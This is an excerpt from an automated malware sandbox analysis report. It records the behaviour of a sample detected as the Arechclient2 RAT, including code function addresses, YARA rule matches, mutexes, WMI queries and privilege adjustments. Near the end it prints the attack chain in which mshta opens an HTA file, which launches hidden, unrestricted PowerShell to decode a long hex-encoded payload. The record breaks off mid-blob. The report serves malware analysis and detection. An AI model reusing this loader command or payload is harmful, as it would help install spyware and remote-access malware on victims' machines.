                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A05778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00A05778
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_006D00404_2_006D0040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_006D00124_2_006D0012
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0077F4D04_2_0077F4D0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FCB02014_2_00FCB020
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FC166314_2_00FC1663
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FC9C8014_2_00FC9C80
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE23F514_2_00FE23F5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0104840014_2_01048400
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF650214_2_00FF6502
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FCE6F014_2_00FCE6F0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF265E14_2_00FF265E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE282A14_2_00FE282A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF89BF14_2_00FF89BF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF6A7414_2_00FF6A74
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD0BE014_2_00FD0BE0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01040A3A14_2_01040A3A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0101EDB214_2_0101EDB2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FECD5114_2_00FECD51
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF6FE614_2_00FF6FE6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01028E4414_2_01028E44
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01040EB714_2_01040EB7
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE33B714_2_00FE33B7
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FC94E014_2_00FC94E0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FDD45D14_2_00FDD45D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEF40914_2_00FEF409
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE16B414_2_00FE16B4
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FCF6A014_2_00FCF6A0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FDF62814_2_00FDF628
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE78C314_2_00FE78C3
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE1BA814_2_00FE1BA8
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEDBA514_2_00FEDBA5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF9CE514_2_00FF9CE5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FDDD2814_2_00FDDD28
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEBFD614_2_00FEBFD6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE1FC014_2_00FE1FC0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA214_2_01609EA2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA914_2_01609EA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129C88015_2_0129C880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129D11015_2_0129D110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129B01F15_2_0129B01F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129107015_2_01291070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_012915E015_2_012915E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129A90815_2_0129A908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129A8FA15_2_0129A8FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129106015_2_01291060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129B09E15_2_0129B09E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129D0F315_2_0129D0F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_012915C315_2_012915C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129BD7815_2_0129BD78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129BD4515_2_0129BD45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538379815_2_05383798
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538DF9015_2_0538DF90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_053827F815_2_053827F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538511815_2_05385118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538004015_2_05380040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05381F6315_2_05381F63
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05381FB015_2_05381FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538378815_2_05383788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538DF8015_2_0538DF80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538C7D815_2_0538C7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_053827DA15_2_053827DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538C7C915_2_0538C7C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538CE6B15_2_0538CE6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538CE8015_2_0538CE80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538000715_2_05380007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05383BE015_2_05383BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05383BCC15_2_05383BCC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05A1E61015_2_05A1E610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05A1F9E815_2_05A1F9E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05A14CC015_2_05A14CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB4A2815_2_06FB4A28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBDBA015_2_06FBDBA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB3B4015_2_06FB3B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB1B0F15_2_06FB1B0F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBC5F815_2_06FBC5F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB9AD815_2_06FB9AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB4A1315_2_06FB4A13
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB021015_2_06FB0210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBDB9015_2_06FBDB90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB3B2315_2_06FB3B23
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB785815_2_06FB7858
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB985115_2_06FB9851
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBBDE015_2_06FBBDE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBA5E015_2_06FBA5E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712472815_2_07124728
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712AF4815_2_0712AF48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071216C815_2_071216C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122EF015_2_07122EF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712DDEC15_2_0712DDEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07120C0815_2_07120C08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712735815_2_07127358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712538815_2_07125388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712D3CE15_2_0712D3CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071233F815_2_071233F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712622815_2_07126228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071216B915_2_071216B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712C51815_2_0712C518
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712C50915_2_0712C509
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07120C0715_2_07120C07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122C3315_2_07122C33
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122C4015_2_07122C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712537B15_2_0712537B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071203D815_2_071203D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122BEF15_2_07122BEF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712621815_2_07126218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071269B615_2_071269B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071269B815_2_071269B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071269C115_2_071269C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712000615_2_07120006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712803215_2_07128032
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_078C751815_2_078C7518
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_078CD57015_2_078CD570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_078C5F4C15_2_078C5F4C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9004015_2_07E90040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E94DC915_2_07E94DC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E94DD815_2_07E94DD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9071915_2_07E90719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E906BE15_2_07E906BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9442815_2_07E94428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9002715_2_07E90027
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9443815_2_07E94438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_053850EB15_2_053850EB
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009AB02016_2_009AB020
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009A166316_2_009A1663
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009A9C8016_2_009A9C80
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C23F516_2_009C23F5
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A2840016_2_00A28400
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D650216_2_009D6502
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009AE6F016_2_009AE6F0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D265E16_2_009D265E
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C282A16_2_009C282A
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D89BF16_2_009D89BF
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A20A3A16_2_00A20A3A
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D6A7416_2_009D6A74
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009B0BE016_2_009B0BE0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009FEDB216_2_009FEDB2
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CCD5116_2_009CCD51
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A20EB716_2_00A20EB7
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A08E4416_2_00A08E44
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D6FE616_2_009D6FE6
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C33B716_2_009C33B7
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009A94E016_2_009A94E0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CF40916_2_009CF409
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009BD45D16_2_009BD45D
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C16B416_2_009C16B4
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009AF6A016_2_009AF6A0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009BF62816_2_009BF628
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C78C316_2_009C78C3
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C1BA816_2_009C1BA8
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CDBA516_2_009CDBA5
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D9CE516_2_009D9CE5
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009BDD2816_2_009BDD28
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CBFD616_2_009CBFD6
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C1FC016_2_009C1FC0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7BFA16_2_010A7BFA
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7C0116_2_010A7C01
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\33260509\updater.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: String function: 00FE8B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: String function: 00FE0D17 appears 70 times
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: String function: 00FD1A36 appears 34 times
                    Source: C:\faggbgb\AutoIt3.exeCode function: String function: 009C0D17 appears 70 times
                    Source: C:\faggbgb\AutoIt3.exeCode function: String function: 009B1A36 appears 34 times
                    Source: C:\faggbgb\AutoIt3.exeCode function: String function: 009C8B30 appears 42 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 4496
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 4496Jump to behavior
                    Source: amsi32_7608.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 14.2.updater.exe.4a76e70.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@34/83@6/5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102A6AD GetLastError,FormatMessageW,14_2_0102A6AD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01018DE9 AdjustTokenPrivileges,CloseHandle,14_2_01018DE9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01019399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_01019399
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009F8DE9 AdjustTokenPrivileges,CloseHandle,16_2_009F8DE9
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_009F9399
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,14_2_0102B976
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,14_2_01024148
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102C9DA CoInitialize,CoCreateInstance,CoUninitialize,14_2_0102C9DA
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,14_2_0102443D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\i1040gi.pdfJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\134e9b5a5131414a9ec92122150d9aa3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqlffxlj.snv.ps1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\faggbgb\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\faggbgb\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\payload_1.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CD